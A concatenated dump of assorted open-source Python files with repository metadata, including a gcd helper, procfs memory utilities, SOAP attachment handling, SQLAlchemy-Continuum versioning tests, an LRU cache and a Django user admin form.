    sys.stdin = open('input.txt', 'r')
    sys.stdout = open('output.txt', 'w')
# AtCoder ABC198 A: read n and print n - 1.
n = inp()
pr(n-1)
|
[
"upadhyay.aaditya2001@gmail.com"
] |
upadhyay.aaditya2001@gmail.com
|
56d5ba5271e24ce0b3cba44c3f85cb51a3403840
|
aac418419c2ef4d10c5c4ceb607d3d8329a5f395
|
/Algorithms/Miscellaneous/Gcd.py
|
bd88fe1c2e7a751961f75b187fda83c809005b18
|
[] |
no_license
|
sudhirshahu51/projects
|
bb13395227355ff84933b6d3a0f158ee42bcdceb
|
b2d8331d14d2163b20535368a60c81f6c8bc2c8f
|
refs/heads/master
| 2021-01-01T17:09:18.654060
| 2017-04-24T10:46:15
| 2017-04-24T10:46:15
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 129
|
py
|
# To find the greatest common divisor
def gcd(x, y):
    """Return the greatest common divisor of x and y (Euclid's algorithm)."""
    # Iterative form of the classic recursion gcd(x, y) = gcd(y % x, x).
    while x != 0:
        x, y = y % x, x
    return y
|
[
"deveshaggrawal19@gmail.com"
] |
deveshaggrawal19@gmail.com
|
2ebe4b45268b5fbc1b7af9b11f7786c3d33e1429
|
9743d5fd24822f79c156ad112229e25adb9ed6f6
|
/xai/brain/wordbase/nouns/_nick.py
|
08c83ac70115fc28cd22074d9bc50429622e92b8
|
[
"MIT"
] |
permissive
|
cash2one/xai
|
de7adad1758f50dd6786bf0111e71a903f039b64
|
e76f12c9f4dcf3ac1c7c08b0cc8844c0b0a104b6
|
refs/heads/master
| 2021-01-19T12:33:54.964379
| 2017-01-28T02:00:50
| 2017-01-28T02:00:50
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 373
|
py
|
#calss header
class _NICK():
def __init__(self,):
self.name = "NICK"
self.definitions = [u'a small cut in a surface or an edge: ', u'prison: ', u'a stated condition, especially of health: ']
self.parents = []
self.childen = []
self.properties = []
self.jsondata = {}
self.specie = 'nouns'
def run(self, obj1 = [], obj2 = []):
return self.jsondata
|
[
"xingwang1991@gmail.com"
] |
xingwang1991@gmail.com
|
40f2752d77ccabe27f319e292703ae57571be5d9
|
7a3c194356437db110671ad163f03df1344a5e87
|
/code/utils/debug/processinfo.py
|
7eb8cf32210c745af00544bfa293ec2de1123e71
|
[
"MIT"
] |
permissive
|
dmytrov/gaussianprocess
|
6b181afdb989415ec929197cdb20efee571ebbcc
|
7044bd2d66f44e10656fee17e94fdee0c24c70bb
|
refs/heads/master
| 2022-12-08T22:23:11.850861
| 2020-09-14T19:37:33
| 2020-09-14T19:37:33
| 295,513,701
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,303
|
py
|
import os
import psutil
# Pseudo-file exposing this process's memory statistics (Linux procfs only).
_proc_status = '/proc/%d/status' % os.getpid()
# Unit suffixes appearing in /proc/<pid>/status -> multiplier to bytes.
_scale = {'kB': 1024.0, 'mB': 1024.0*1024.0,
          'KB': 1024.0, 'MB': 1024.0*1024.0}
def _VmB(VmKey):
    '''Private.

    Read the value of *VmKey* (e.g. ``'VmRSS:'``) from /proc/<pid>/status
    and return it in bytes, or 0.0 when it cannot be determined.
    '''
    global _proc_status, _scale
    # get pseudo file /proc/<pid>/status; the context manager guarantees
    # the handle is closed (the original leaked it on read errors).
    try:
        with open(_proc_status) as t:
            v = t.read()
    except OSError:
        # Narrowed from a bare ``except:``: only file-access failures mean
        # "non-Linux / no procfs"; other bugs should surface, not be hidden.
        return 0.0
    # get VmKey line e.g. 'VmRSS:  9999  kB\n ...'
    try:
        i = v.index(VmKey)
    except ValueError:
        return 0.0  # key absent in this kernel's status file
    v = v[i:].split(None, 3)  # whitespace
    if len(v) < 3:
        return 0.0  # invalid format?
    # convert Vm value to bytes
    return float(v[1]) * _scale[v[2]]
def memory(since=0.0):
    """Return total virtual memory size in bytes, relative to *since*."""
    current = _VmB('VmSize:')
    return current - since
def resident(since=0.0):
    """Return resident-set memory usage in bytes, relative to *since*."""
    current = _VmB('VmRSS:')
    return current - since
def stacksize(since=0.0):
    """Return stack size in bytes, relative to *since*."""
    current = _VmB('VmStk:')
    return current - since
def print_meminfo(message=""):
    '''Prints memory useage

    Writes one line with *message*, the PID, and this process's rss/vms
    (via psutil) converted to MB.
    '''
    process = psutil.Process(os.getpid())
    mem = process.memory_info()
    # 2**20 converts bytes -> MiB.
    print("|{} |PID: {} |rss: {}MB |vms: {}MB |".format(
        message, process.pid, mem.rss / float(2**20), mem.vms / float(2**20)))

if __name__ == "__main__":
    print_meminfo()
|
[
"dmytro.velychko@gmail.com"
] |
dmytro.velychko@gmail.com
|
ceb9352b0878dace0d3cd48be46ad14679a4847b
|
aec4fcd0361b9292c48178e5e77cab5df17f8f44
|
/DRL/Base.py
|
f90397ddb2603f156ecb04afe07cb33123db724e
|
[
"Apache-2.0"
] |
permissive
|
kbehouse/ezDRL
|
99bf2d1b37fceaa219651264c2f865ef3c70b146
|
1f8e5675780700d8e66f753fceac17c2b36fa56b
|
refs/heads/master
| 2021-08-24T12:39:48.804699
| 2017-12-05T09:05:53
| 2017-12-05T09:05:53
| 110,926,129
| 2
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 533
|
py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# File: DRL.py
# Description: Abstract Class For DRL Methods
# Author: Kartic <kbehouse@gmail.com>
import six
from abc import ABCMeta,abstractmethod
@six.add_metaclass(ABCMeta)
class RL(object):
    """Abstract base for RL agents: action selection plus training."""
    @abstractmethod
    def choose_action(self, state):
        # Return the action to take in *state*.
        pass
    @abstractmethod
    def train(self, states, actions, rewards, next_state, done):
        # Update the agent from the given experience.
        pass
@six.add_metaclass(ABCMeta)
class DRL(RL):
    """Abstract base for deep-RL agents: adds network construction."""
    @abstractmethod
    def _build_net(self, msg):
        # Build the underlying neural network(s).
        pass
|
[
"kbehouse@gmail.com"
] |
kbehouse@gmail.com
|
c858313d78d4f1f97702e366a93be4fd43b773ca
|
22f1c0d8406be377e588ac0eaeea7bd19385156c
|
/src/zeep/wsdl/attachments.py
|
6a85312813d7e7288a0ade3ed9b22b4bc7827ab0
|
[
"BSD-3-Clause",
"MIT"
] |
permissive
|
mbehrle/python-zeep
|
999be22a91f6df04b995b823dc68ae83953fb046
|
5921b047d4fda2d87d9ab178fd37ef77d70d1a1f
|
refs/heads/master
| 2021-01-23T08:04:47.801530
| 2017-01-31T11:39:47
| 2017-01-31T11:39:47
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,727
|
py
|
"""Basic implementation to support SOAP-Attachments
See https://www.w3.org/TR/SOAP-attachments
"""
import base64
from cached_property import cached_property
from requests.structures import CaseInsensitiveDict
class MessagePack(object):
    """Container for a multipart SOAP-with-Attachments response:
    the root (envelope) part plus zero or more attachment parts."""
    def __init__(self, parts):
        self._parts = parts
    def __repr__(self):
        return '<MessagePack(attachments=[%s])>' % (
            ', '.join(repr(a) for a in self.attachments))
    @property
    def root(self):
        # The root part; set externally via _set_root, so reading it
        # before that call raises AttributeError.
        return self._root
    def _set_root(self, root):
        self._root = root
    @cached_property
    def attachments(self):
        # Wrap each raw part lazily; cached after first access.
        return [Attachment(part) for part in self._parts]
    def get_by_content_id(self, content_id):
        # Linear scan; returns None when no attachment matches.
        for attachment in self.attachments:
            if attachment.content_id == content_id:
                return attachment
class Attachment(object):
    """One MIME part of a SOAP-with-Attachments message."""

    def __init__(self, part):
        # Decode header names/values using the part's encoding and expose
        # them case-insensitively, as MIME headers require.
        self.headers = CaseInsensitiveDict({
            k.decode(part.encoding): v.decode(part.encoding)
            for k, v in part.headers.items()
        })
        self.content_type = self.headers.get('Content-Type', None)
        self.content_id = self.headers.get('Content-ID', None)
        self.content_location = self.headers.get('Content-Location', None)
        self._part = part

    def __repr__(self):
        return '<Attachment(%r, %r)>' % (self.content_id, self.content_type)

    @cached_property
    def content(self):
        """Return the part's payload, base64-decoding when so encoded."""
        encoding = self.headers.get('Content-Transfer-Encoding', None)
        content = self._part.content
        if encoding == 'base64':
            return base64.b64decode(content)
        # 'binary' and any other/unknown encoding return the raw payload;
        # the original had separate branches returning the same value.
        return content
|
[
"michael@mvantellingen.nl"
] |
michael@mvantellingen.nl
|
c0f1f52cd692bb07290aa056b772de8af1130bde
|
6e1aa6cfe11a93740cdbc9503d992769ced8879b
|
/tests/test_column_inclusion_and_exclusion.py
|
c58313a1b040dd81981afb2faf5082b2e5c0d84b
|
[] |
no_license
|
dtheodor/sqlalchemy-continuum
|
04008d03209a1df930037e324e3f666a10a8abfc
|
22dbc811ac3a67d883da6b47584992d6dd22b20c
|
refs/heads/master
| 2021-01-22T16:32:22.137475
| 2014-10-23T09:55:15
| 2014-10-23T09:55:15
| 17,176,669
| 1
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,756
|
py
|
from datetime import datetime
from pytest import mark
import sqlalchemy as sa
from sqlalchemy_utils import TSVectorType
from sqlalchemy_continuum import version_class
from tests import TestCase
class TestDateTimeColumnExclusion(TestCase):
    """Datetime/date columns with defaults are excluded from the version
    table by default; non-datetime columns (e.g. Boolean) are kept."""
    def create_models(self):
        class Article(self.Model):
            __tablename__ = 'article'
            __versioned__ = {}
            id = sa.Column(sa.Integer, autoincrement=True, primary_key=True)
            name = sa.Column(sa.Unicode(255))
            created_at = sa.Column(sa.DateTime, default=datetime.now)
            # NOTE(review): this default returns the bound method
            # ``date`` itself, not its result (missing call parens) --
            # presumably intended ``datetime.now().date()``; the tests
            # here never evaluate the default, so it goes unnoticed.
            creation_date = sa.Column(
                sa.Date, default=lambda: datetime.now().date
            )
            is_deleted = sa.Column(sa.Boolean, default=False)
        self.Article = Article
    def test_datetime_columns_with_defaults_excluded_by_default(self):
        assert (
            'created_at' not in
            version_class(self.Article).__table__.c
        )
    def test_date_columns_with_defaults_excluded_by_default(self):
        assert (
            'creation_date' not in
            version_class(self.Article).__table__.c
        )
    def test_datetime_exclusion_only_applies_to_datetime_types(self):
        assert (
            'is_deleted' in
            version_class(self.Article).__table__.c
        )
@mark.skipif("os.environ.get('DB') != 'postgres'")
class TestTSVectorTypeColumnExclusion(TestCase):
    """TSVector (PostgreSQL full-text) columns are excluded from the
    version table by default; only runs against a postgres backend."""
    def create_models(self):
        class Article(self.Model):
            __tablename__ = 'article'
            __versioned__ = {}
            id = sa.Column(sa.Integer, autoincrement=True, primary_key=True)
            name = sa.Column(sa.Unicode(255))
            search_vector = sa.Column(TSVectorType)
        self.Article = Article
    def test_tsvector_typed_columns_excluded_by_default(self):
        assert (
            'search_vector' not in
            version_class(self.Article).__table__.c
        )
class TestDateTimeColumnInclusion(TestCase):
    """An explicit ``'include'`` entry overrides the default exclusion
    of datetime columns with defaults."""
    def create_models(self):
        class Article(self.Model):
            __tablename__ = 'article'
            __versioned__ = {
                'include': 'created_at'
            }
            id = sa.Column(sa.Integer, autoincrement=True, primary_key=True)
            name = sa.Column(sa.Unicode(255))
            created_at = sa.Column(sa.DateTime, default=datetime.now)
        self.Article = Article
    def test_datetime_columns_with_defaults_excluded_by_default(self):
        assert (
            'created_at' in
            version_class(self.Article).__table__.c
        )
class TestColumnExclusion(TestCase):
    """Columns listed under ``'exclude'`` are dropped from the version
    class, and changes to them alone do not create a new version."""
    def create_models(self):
        class TextItem(self.Model):
            __tablename__ = 'text_item'
            __versioned__ = {
                'exclude': ['content']
            }
            id = sa.Column(sa.Integer, autoincrement=True, primary_key=True)
            name = sa.Column(sa.Unicode(255))
            content = sa.Column(sa.UnicodeText)
        self.TextItem = TextItem
    def test_excluded_columns_not_included_in_version_class(self):
        cls = version_class(self.TextItem)
        manager = cls._sa_class_manager
        assert 'content' not in manager.keys()
    def test_versioning_with_column_exclusion(self):
        item = self.TextItem(name=u'Some textitem', content=u'Some content')
        self.session.add(item)
        self.session.commit()
        assert item.versions[0].name == u'Some textitem'
    def test_does_not_create_record_if_only_excluded_column_updated(self):
        item = self.TextItem(name=u'Some textitem')
        self.session.add(item)
        self.session.commit()
        # Updating only the excluded column must not bump the version count.
        item.content = u'Some content'
        self.session.commit()
        assert item.versions.count() == 1
|
[
"konsta.vesterinen@gmail.com"
] |
konsta.vesterinen@gmail.com
|
200adc49c9d7032f1d19d9caec3133ac4ebf1673
|
54f352a242a8ad6ff5516703e91da61e08d9a9e6
|
/Source Codes/AtCoder/arc098/C/3270864.py
|
5c62ff7a855a8056aab79c2b97f8d36d0b122b1f
|
[] |
no_license
|
Kawser-nerd/CLCDSA
|
5cbd8a4c3f65173e4e8e0d7ed845574c4770c3eb
|
aee32551795763b54acb26856ab239370cac4e75
|
refs/heads/master
| 2022-02-09T11:08:56.588303
| 2022-01-26T18:53:40
| 2022-01-26T18:53:40
| 211,783,197
| 23
| 9
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 802
|
py
|
# NOTE(review): leading whitespace was lost in this dump; the block
# structure below is reconstructed from the algorithm's logic -- verify
# against the original submission.
from collections import defaultdict
N, K, Q = map(int, input().split())
A = list(map(int, input().split()))
A_sorted = sorted(A)
ans = float("inf")
ap = 0
# Fix the smallest removed value `a` (each distinct value once, ascending).
for i, a in enumerate(A_sorted):
    if a==ap:
        continue
    ap = a
    # Split A into maximal segments of elements >= a; L[s] is the
    # remaining length of segment s, d maps value -> its segment indices.
    L = [0]
    d = defaultdict(list)
    for aa in A:
        if aa < a:
            if L[-1]==0:
                continue
            else:
                L.append(0)
        else:
            L[-1]+=1
            d[aa].append(len(L)-1)
    # Grow the candidate largest removed value `aa` upward, greedily
    # removing elements from segments still long enough (>= K).
    cnt = 0
    aap = 0
    for aa in A_sorted[i:]:
        if aap==aa: continue
        aap = aa
        for v in d[aa]:
            if L[v] >= K:
                L[v] -= 1
                cnt += 1
        if cnt >= Q:
            break
    else:
        # Even the largest value cannot reach Q removals; larger `a`
        # only shrinks the segments, so stop entirely.
        break
    ans = min(ans, aa-a)
print(ans)
|
[
"kwnafi@yahoo.com"
] |
kwnafi@yahoo.com
|
3a735af93117f64efe81849413af4f3138ba8356
|
9cb7670c64c13f09abee315f85f1f6b67b8eb1ad
|
/ptp/components/language/sentence_one_hot_encoder.py
|
3996236c4d9b703946b38c4f4760c5c9e33b0c2a
|
[
"Apache-2.0"
] |
permissive
|
ConnectionMaster/pytorchpipe
|
057325a5d4e8e6ce2198a953a705721388531add
|
9cb17271666061cb19fe24197ecd5e4c8d32c5da
|
refs/heads/develop
| 2023-04-07T17:46:26.451692
| 2019-11-05T23:36:13
| 2019-11-05T23:36:13
| 183,084,219
| 1
| 0
|
Apache-2.0
| 2023-04-03T23:18:43
| 2019-04-23T19:38:29
|
Python
|
UTF-8
|
Python
| false
| false
| 4,091
|
py
|
# Copyright (C) tkornuta, IBM Corporation 2019
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
__author__ = "Tomasz Kornuta"
import torch
from ptp.components.component import Component
from ptp.components.mixins.word_mappings import WordMappings
from ptp.data_types.data_definition import DataDefinition
class SentenceOneHotEncoder(Component, WordMappings):
    """
    Class responsible for encoding of samples being sequences of words using 1-hot encoding.
    """
    def __init__(self, name, config):
        """
        Initializes the component.

        :param name: Component name (read from configuration file).
        :type name: str

        :param config: Dictionary of parameters (read from the configuration ``.yaml`` file).
        :type config: :py:class:`ptp.configuration.ConfigInterface`
        """
        # Call constructor(s) of parent class(es) - in the right order!
        Component.__init__(self, name, SentenceOneHotEncoder, config)
        WordMappings.__init__(self)
        # Set key mappings.
        self.key_inputs = self.stream_keys["inputs"]
        self.key_outputs = self.stream_keys["outputs"]
    def input_data_definitions(self):
        """
        Function returns a dictionary with definitions of input data that are required by the component.

        :return: dictionary containing input data definitions (each of type :py:class:`ptp.utils.DataDefinition`).
        """
        return {
            self.key_inputs: DataDefinition([-1, -1, 1], [list, list, str], "Batch of sentences, each represented as a list of words [BATCH_SIZE] x [SEQ_LENGTH] x [string]"),
            }
    def output_data_definitions(self):
        """
        Function returns a dictionary with definitions of output data produced the component.

        :return: dictionary containing output data definitions (each of type :py:class:`ptp.utils.DataDefinition`).
        """
        return {
            self.key_outputs: DataDefinition([-1, -1, len(self.word_to_ix)], [list, list, torch.Tensor], "Batch of sentences, each represented as a list of vectors [BATCH_SIZE] x [SEQ_LENGTH] x [VOCABULARY_SIZE]"),
            }
    def __call__(self, data_streams):
        """
        Encodes "inputs" in the format of list of tokens (for a single sample)
        Stores result in "encoded_inputs" field of in data_streams.

        :param data_streams: :py:class:`ptp.utils.DataStreams` object containing (among others):

            - "inputs": expected input field containing list of words [BATCH_SIZE] x [SEQ_SIZE] x [string]

            - "encoded_targets": added output field containing list of indices  [BATCH_SIZE] x [SEQ_SIZE] x [VOCABULARY_SIZE1]
        """
        # Get inputs to be encoded.
        inputs = data_streams[self.key_inputs]
        outputs_list = []
        # Process samples 1 by one.
        for sample in inputs:
            assert isinstance(sample, (list,)), 'This encoder requires input sample to contain a list of words'
            # Process list.
            output_sample = []
            # Encode sample (list of words)
            for token in sample:
                # Create empty vector.
                output_token = torch.zeros(len(self.word_to_ix)).type(self.app_state.FloatTensor)
                # Add one for given word. Each token gets a fresh zero vector,
                # so the marked entry ends up exactly 1.
                # NOTE(review): a token absent from word_to_ix raises KeyError
                # here -- there is no OOV handling; confirm the vocabulary
                # covers all inputs.
                output_token[self.word_to_ix[token]] += 1
                # Add to outputs.
                output_sample.append( output_token )
            outputs_list.append(output_sample)
        # Create the returned dict.
        data_streams.publish({self.key_outputs: outputs_list})
|
[
"tkornut@us.ibm.com"
] |
tkornut@us.ibm.com
|
ff6ed44e73bac7a6b62db504dd1009a7c10746ca
|
2e682fd72e3feaa70e3f7bf2a3b83c50d783ec02
|
/PyTorch/contrib/cv/video/I3D/mmaction/datasets/__init__.py
|
f04440bfbd5b1cb1aa81e8b37daed35a0a8f87cc
|
[
"GPL-1.0-or-later",
"Apache-2.0",
"BSD-2-Clause",
"MIT",
"BSD-3-Clause",
"LicenseRef-scancode-generic-cla",
"LicenseRef-scancode-unknown-license-reference"
] |
permissive
|
Ascend/ModelZoo-PyTorch
|
4c89414b9e2582cef9926d4670108a090c839d2d
|
92acc188d3a0f634de58463b6676e70df83ef808
|
refs/heads/master
| 2023-07-19T12:40:00.512853
| 2023-07-17T02:48:18
| 2023-07-17T02:48:18
| 483,502,469
| 23
| 6
|
Apache-2.0
| 2022-10-15T09:29:12
| 2022-04-20T04:11:18
|
Python
|
UTF-8
|
Python
| false
| false
| 1,922
|
py
|
# Copyright 2020 Huawei Technologies Co., Ltd
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ============================================================================
from .activitynet_dataset import ActivityNetDataset
from .audio_dataset import AudioDataset
from .audio_feature_dataset import AudioFeatureDataset
from .audio_visual_dataset import AudioVisualDataset
from .ava_dataset import AVADataset
from .base import BaseDataset
from .blending_utils import (BaseMiniBatchBlending, CutmixBlending,
MixupBlending)
from .builder import (BLENDINGS, DATASETS, PIPELINES, build_dataloader,
build_dataset)
from .dataset_wrappers import RepeatDataset
from .hvu_dataset import HVUDataset
from .image_dataset import ImageDataset
from .pose_dataset import PoseDataset
from .rawframe_dataset import RawframeDataset
from .rawvideo_dataset import RawVideoDataset
from .ssn_dataset import SSNDataset
from .video_dataset import VideoDataset
__all__ = [
'VideoDataset', 'build_dataloader', 'build_dataset', 'RepeatDataset',
'RawframeDataset', 'BaseDataset', 'ActivityNetDataset', 'SSNDataset',
'HVUDataset', 'AudioDataset', 'AudioFeatureDataset', 'ImageDataset',
'RawVideoDataset', 'AVADataset', 'AudioVisualDataset',
'BaseMiniBatchBlending', 'CutmixBlending', 'MixupBlending', 'DATASETS',
'PIPELINES', 'BLENDINGS', 'PoseDataset'
]
|
[
"wangjiangben@huawei.com"
] |
wangjiangben@huawei.com
|
d8751d6aed8551800d5fa2b4ca68e98c118d9357
|
284b8949a5e8a65d791bc8b6531fb4029100f798
|
/02281043.py
|
511423569a2e60d8b6f61d89283604c871259bad
|
[] |
no_license
|
Yanl05/Crawler
|
3ce19be3a041b9db0a2fa5e340f4e9aa37593e4c
|
af1c34b9e28b24740e090415a45c0ee808d058ab
|
refs/heads/master
| 2020-04-09T16:35:22.272829
| 2018-12-05T04:25:39
| 2018-12-05T04:25:39
| 160,457,052
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 146
|
py
|
class Car:
    """Minimal demo class: a class-level color attribute and a run() action."""

    color = ''

    def run(self):
        # Announce that the car is moving.
        print('go go go!!')
bmw = Car()
bmw.color = 'red'
print(bmw.color)
bmw.run()
print(bmw.run)
|
[
"756593069@qq.com"
] |
756593069@qq.com
|
eeeff347b088cf7928a142ac122aa3e6ebe54d89
|
6f5b8fa3693be70f258e1a74f4874d02fdb105a6
|
/asdl/__init__.py
|
5dde4913227376aa52bf3e5eb64c1cadab4fcc40
|
[
"Apache-2.0"
] |
permissive
|
ionutzzu12/external-knowledge-codegen
|
fb02823516e14f19d171928d88588623631d2963
|
3f96ee7c4a50cdd8649e564115dbe96bff059d87
|
refs/heads/master
| 2023-02-24T12:22:55.962963
| 2020-06-06T08:34:54
| 2020-06-06T08:34:54
| 262,047,517
| 0
| 0
|
Apache-2.0
| 2020-06-06T08:34:55
| 2020-05-07T12:43:54
|
Python
|
UTF-8
|
Python
| false
| false
| 334
|
py
|
import six
from .lang.lambda_dcs.lambda_dcs_transition_system import LambdaCalculusTransitionSystem
from .lang.prolog.prolog_transition_system import PrologTransitionSystem
if six.PY2:
from .lang.py.py_transition_system import PythonTransitionSystem
else:
from .lang.py3.py3_transition_system import Python3TransitionSystem
|
[
"frankxu2004@gmail.com"
] |
frankxu2004@gmail.com
|
583929ad0765fe89d9a7f1fc8b3f321c8cb5bdbe
|
6b78bd7f62f7f407bf11d877cc4d91e7db3b62fe
|
/csc/python/week-3-ds/src/day3/lru_cache/lru_cache.py
|
b8009b5e6480947a1769a37d0687614b451baee4
|
[] |
no_license
|
PascalUlor/code-challenges
|
b85efacd4bc5999a0748d1fa1e84f503be09dc94
|
6488d0a6d2729bd50b106573f16488479fd6e264
|
refs/heads/master
| 2023-03-03T17:50:18.413127
| 2023-02-21T13:10:02
| 2023-02-21T13:10:02
| 212,979,719
| 1
| 0
| null | 2023-02-15T22:59:13
| 2019-10-05T10:14:29
|
Python
|
UTF-8
|
Python
| false
| false
| 2,759
|
py
|
from doubly_linked_list import DoublyLinkedList
class LRUCache:
"""
Our LRUCache class keeps track of the max number of nodes it
can hold, the current number of nodes it is holding, a doubly-
linked list that holds the key-value entries in the correct
order, as well as a storage dict that provides fast access
to every node stored in the cache.
"""
def __init__(self, limit=10):
self.limit = limit
self.size = 0
self.order = DoublyLinkedList()
self.storage = dict()
"""
Retrieves the value associated with the given key. Also
needs to move the key-value pair to the end of the order
such that the pair is considered most-recently used.
Returns the value associated with the key or None if the
key-value pair doesn't exist in the cache.
"""
def get(self, key):
# if the key exists in the storage
if key in self.storage:
# set the node to the item at the key in storage
node = self.storage[key]
# move the node to end of order
self.order.move_to_end(node)
# return the nodes value
return node.value[1]
# otherwise
else:
# return None
return None
"""
Adds the given key-value pair to the cache. The newly-
added pair should be considered the most-recently used
entry in the cache. If the cache is already at max capacity
before this entry is added, then the oldest entry in the
cache needs to be removed to make room. Additionally, in the
case that the key already exists in the cache, we simply
want to overwrite the old value associated with the key with
the newly-specified value.
"""
def set(self, key, value):
# if key exists in storage
if key in self.storage:
# set the node to the storage at the key
node = self.storage[key]
# set the nodes value to the key value pair
node.value = (key, value)
# move the node to the end and
self.order.move_to_end(node)
# return to caller
return
# if the size is reaching the limit
if self.size == self.limit:
# delete the item at the head of the storage order
del self.storage[self.order.head.value[0]]
# remove node from head of the order
self.order.remove_from_head()
# decrement the size
self.size -= 1
# add the key value pair to the orders tail
self.order.add_to_tail((key, value))
# set the storage at key to the orders tail
self.storage[key] = self.order.tail
# increment size
self.size += 1
|
[
"pascalulor@yahoo.com"
] |
pascalulor@yahoo.com
|
5f9cd7cd2d9cea9cc9a1f16b39eca20fbfb64326
|
8cbe8ff380e170312a36a0213dfaddd71f0d8bf7
|
/accounts/admin.py
|
f619a6fecfd446404431f7a8e26f82aa010f4708
|
[] |
no_license
|
Gemy-star/bauhaus_new
|
60926aa9907b2b619a620d3ca0324ed7d99d08d1
|
270663f918c8965e9760ef547b89d3c8d7967120
|
refs/heads/main
| 2023-02-12T09:58:51.939396
| 2021-01-12T21:17:03
| 2021-01-12T21:17:03
| 321,507,414
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,099
|
py
|
from django import forms
from django.contrib import admin
from django.contrib.auth.admin import UserAdmin as BaseUserAdmin
from django.contrib.auth.forms import ReadOnlyPasswordHashField
from .models import User
class AddUserForm(forms.ModelForm):
"""
New User Form. Requires password confirmation.
"""
password1 = forms.CharField(
label='Password', widget=forms.PasswordInput
)
password2 = forms.CharField(
label='Confirm password', widget=forms.PasswordInput
)
class Meta:
model = User
fields = (
'email', 'first_name', 'last_name', 'phone', 'is_engineer', 'is_outdoor_engineer', 'is_admin',
'is_customer',
'is_superuser',
'profile_pic', 'is_active', 'is_staff', 'user_type')
def clean_password2(self):
# Check that the two password entries match
password1 = self.cleaned_data.get("password1")
password2 = self.cleaned_data.get("password2")
if password1 and password2 and password1 != password2:
raise forms.ValidationError("Passwords do not match")
return password2
def save(self, commit=True):
# Save the provided password in hashed format
user = super().save(commit=False)
user.set_password(self.cleaned_data["password1"])
if commit:
user.save()
return user
class UpdateUserForm(forms.ModelForm):
"""
Update User Form. Doesn't allow changing password in the Admin.
"""
password = ReadOnlyPasswordHashField()
class Meta:
model = User
fields = (
'email', 'first_name', 'last_name', 'phone', 'is_engineer', 'is_outdoor_engineer', 'is_admin',
'is_customer',
'is_superuser',
'profile_pic', 'is_active', 'is_staff', 'user_type')
def clean_password(self):
# Password can't be changed in the admin
return self.initial["password"]
class UserAdmin(BaseUserAdmin):
form = UpdateUserForm
add_form = AddUserForm
list_display = ('email', 'first_name', 'last_name', 'is_staff', 'timestamp')
list_filter = ('is_staff',)
fieldsets = (
(None, {'fields': ('email', 'password')}),
('Personal info', {'fields': ('first_name', 'last_name', 'phone', 'address', 'profile_pic')}),
('Permissions', {'fields': (
'is_active', 'is_engineer', 'is_admin', 'is_customer', 'is_outdoor_engineer', 'user_type', 'is_staff')}),
)
add_fieldsets = (
(
None,
{
'classes': ('wide',),
'fields': (
'email', 'first_name', 'last_name', 'password1', 'profile_pic', 'password2',
'user_type', 'phone', 'address',
'is_active', 'is_engineer', 'is_admin', 'is_outdoor_engineer', 'is_customer'
)
}
),
)
search_fields = ('email', 'first_name', 'last_name')
ordering = ('email', 'first_name', 'last_name')
filter_horizontal = ()
admin.site.register(User, UserAdmin)
|
[
"m.yassen.93@gmail.com"
] |
m.yassen.93@gmail.com
|
375ca61df7f3c090b6cae7b47334f507cdcba96b
|
cb4ab4584c4feda3bb1826aafadfea462ecdbf42
|
/AIs/AI_PlanC/__init__.py
|
d40f31db6ffa0b9f248c9431ab20f861a8eab6c4
|
[
"MIT"
] |
permissive
|
rimpo/coding-world-cup
|
15660a570ca400c82f0966f302b9b4a7a8968c77
|
964e3b58637f768f6dc5976bf729d993d63b46ab
|
refs/heads/master
| 2020-12-02T22:49:53.789544
| 2017-09-11T15:47:24
| 2017-09-11T15:47:24
| 30,821,540
| 0
| 0
| null | 2015-02-21T01:56:31
| 2015-02-15T07:56:10
|
C#
|
UTF-8
|
Python
| false
| false
| 231
|
py
|
from .coding_worldcup_api import CodingWorldCupAPI
from .js_object import JSObject
from .goh_ai import GohAI
from .position import Position
from .vector import Vector
from .classes import MarginFactors, DirectionType, GoalType
|
[
"richard.s.shepherd@gmail.com"
] |
richard.s.shepherd@gmail.com
|
db8283120c322835780a8040b991fc6cd6140f64
|
8fa3634da0f827c57480051fab280903501fa007
|
/setup.py
|
4553dd8663c4ff0091c6649a2c32f26918cf3d92
|
[
"Apache-2.0"
] |
permissive
|
ahnan4arch/seldom-pytest
|
519a30cbe31edc57ab804088acfa6a9f72c6b681
|
40e252c686118d137927592d6749313470ea0481
|
refs/heads/main
| 2023-07-24T04:49:26.858053
| 2021-09-07T15:28:45
| 2021-09-07T15:28:45
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,328
|
py
|
import re
import ast
import setuptools
with open("README.md", "r", encoding="utf-8") as fh:
long_description = fh.read()
_version_re = re.compile(r'__version__\s+=\s+(.*)')
with open('pytest_seldom/__init__.py', 'rb') as f:
version = str(ast.literal_eval(_version_re.search(
f.read().decode('utf-8')).group(1)))
setuptools.setup(
name="pytest-seldom",
version=version,
author="bugmaster",
author_email="fnngj@126.com",
description="A pytest wrapper with fixtures for Seldom to automate web browsers",
long_description=long_description,
long_description_content_type="text/markdown",
url="https://github.com/seldomQA/seldom-pytest",
packages=["pytest_seldom"],
include_package_data=True,
install_requires=[
"pytest-html>=3.0.0",
"poium>=1.0.2",
"pytest",
"pytest-base-url",
],
entry_points={"pytest11": ["seldom = pytest_seldom.pytest_seldom"]},
classifiers=[
"Programming Language :: Python :: 3",
